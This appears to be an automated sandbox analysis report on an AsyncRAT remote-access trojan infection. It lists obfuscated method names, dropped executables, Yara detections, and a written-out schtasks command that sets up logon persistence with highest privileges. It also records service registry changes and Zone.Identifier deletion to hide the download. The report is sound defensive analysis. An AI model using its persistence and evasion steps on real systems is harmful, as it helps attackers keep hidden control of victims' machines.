Source: dhcpmon.exe.4.dr, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: 4.0.fi.exe.40000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 4.0.fi.exe.40000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: 4.2.fi.exe.40000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 4.2.fi.exe.40000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: 7.2.dhcpmon.exe.c40000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 7.2.dhcpmon.exe.c40000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: 7.0.dhcpmon.exe.c40000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 7.0.dhcpmon.exe.c40000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'

Persistence and Installation Behavior:

Drops PE files

Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Local\Temp\ame.exe			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\ame.exe	File created: C:\Users\user\AppData\Roaming\Notepads.exe			Jump to dropped file
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Local\Temp\fi.exe			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\fi.exe	File created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe			Jump to dropped file

Boot Survival:

Yara detected AsyncRAT

Source: Yara match	File source: 00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.325883789.0000016C16535000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.547269938.0000000012956000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.329227770.0000000000502000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.533439085.0000000000EE2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.592748395.0000000000EE2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.575722228.0000000000F42000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.325568596.0000016C16534000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000000.540116031.0000000000F42000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.533753846.0000000000502000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ame.exe PID: 6592, type: MEMORY
Source: Yara match	File source: Process Memory Space: Notepads.exe PID: 5444, type: MEMORY
Source: Yara match	File source: Process Memory Space: wscript.exe PID: 6428, type: MEMORY
Source: Yara match	File source: Process Memory Space: Notepads.exe PID: 2152, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Notepads.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\ame.exe, type: DROPPED
Source: Yara match	File source: 3.0.ame.exe.500000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.wscript.exe.16c1711f630.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.Notepads.exe.ee0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.wscript.exe.16c1711f630.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.ame.exe.129567e0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.0.Notepads.exe.f40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.Notepads.exe.f40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.Notepads.exe.ee0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.ame.exe.500000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.wscript.exe.16c165eefd0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.ame.exe.129567e0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.wscript.exe.16c170d0090.5.raw.unpack, type: UNPACKEDPE

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\System32\wscript.exe

Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc onlogon /rl highest /tn Notepads.exe /tr 'C:\Users\user\AppData\Roaming\Notepads.exe

Creates or modifies windows services

Source: C:\Users\user\AppData\Local\Temp\ame.exe

Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\MSDTC Bridge 3.0.0.0\Linkage

Jump to behavior

Modifies existing windows services

Source: C:\Users\user\AppData\Local\Temp\ame.exe

Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\.NET Memory Cache 4.0\Linkage

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Users\user\AppData\Local\Temp\fi.exe

File opened: C:\Users\user\AppData\Local\Temp\fi.exe:Zone.Identifier read attributes | delete

Jump to behavior

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Windows\System32\wscript.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Disables application error messsages (SetErrorMode)

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ame.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ame.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ame.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ame.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ame.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ame.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ame.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ame.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ame.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ame.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ame.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ame.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ame.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ame.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ame.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ame.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ame.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ame.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ame.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ame.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ame.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ame.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ame.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ame.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ame.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ame.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ame.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ame.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ame.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ame.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ame.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ame.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ame.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fi.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fi.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fi.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fi.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fi.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fi.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fi.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fi.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fi.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fi.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fi.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fi.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fi.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fi.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fi.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fi.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fi.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fi.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fi.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fi.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fi.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fi.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fi.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fi.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fi.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fi.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fi.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fi.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fi.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fi.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fi.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fi.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fi.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fi.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fi.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fi.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fi.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fi.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fi.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fi.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fi.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Notepads.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Notepads.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Notepads.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Notepads.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Notepads.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Notepads.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Notepads.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Notepads.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Notepads.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Notepads.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Notepads.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Notepads.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Notepads.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Notepads.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Notepads.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Notepads.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Notepads.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Notepads.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Notepads.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
